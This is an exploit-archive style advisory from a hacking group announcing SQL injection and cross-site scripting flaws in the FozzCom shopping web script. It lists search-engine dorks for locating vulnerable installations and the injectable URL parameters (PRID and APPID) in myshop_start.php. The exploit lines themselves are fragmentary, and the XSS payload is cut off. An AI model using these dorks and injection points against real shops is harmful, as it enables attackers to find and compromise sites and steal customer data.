Exploit Title:FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities Date: 12.10.2010 Author: Dr.0rYX and Cr3w-DZ Category: webapps/0day Version: 7.94+8.04 **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ \ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / \/ /_\ \_ __ \| | | | \ ______ \__ \ | __) \_ __ \ |/ ___\\__ \ * * | | \ \_/ \ | \/| | | Y \ /_____/ / __ \_| \ | | \/ \ \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * \/ \/ \/ \/ \/ \/ \/ * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ __\/ __ \\__ \ / \ * * \___ \\ ___/\ \___| | /| | \/ || | \___ | | | \ ___/ / __ \| Y Y \ * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * \/ \/ \/ \/ \/ \/ \/ * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : sniper-dz@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [!] notice : Dr.0rYX: MY OLD EMAIL VX3@HOTMAIL.DE CLOSED MY NEW EMAIL IS SNIPER-DZ@HOTMAIL.DE ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.fozztech.se [+] script : FozzCom shopping [+] Download : http://www.fozztech.se (sell script ) [+] Vulnerability : SQL injection Vulnerability xss Vulnerability [+] Dork : inurl:"myshop_start.php?APPID=" [+] Dork : allintext:"Powered by FozzCom." **************************************************************************/ [ Vulnerable File 1] http://server/[path]/myshop_start.php?APPID=2&PRID=sql[N.A.S.T ] [ Exploit 1 ] http://server/myshop/myshop_start.php?APPID=2&PRID= SQL INJECTION *************************************************************************/ [ Vulnerable File 2] http://server/[path]/myshop_start.php?APPID=xss[N.A.S.T ] [ Exploit 2 ] http://www.server/myshop/myshop_start.php?APPID='> [ GReet ] [+] : Exploit-db.com , v4-team.com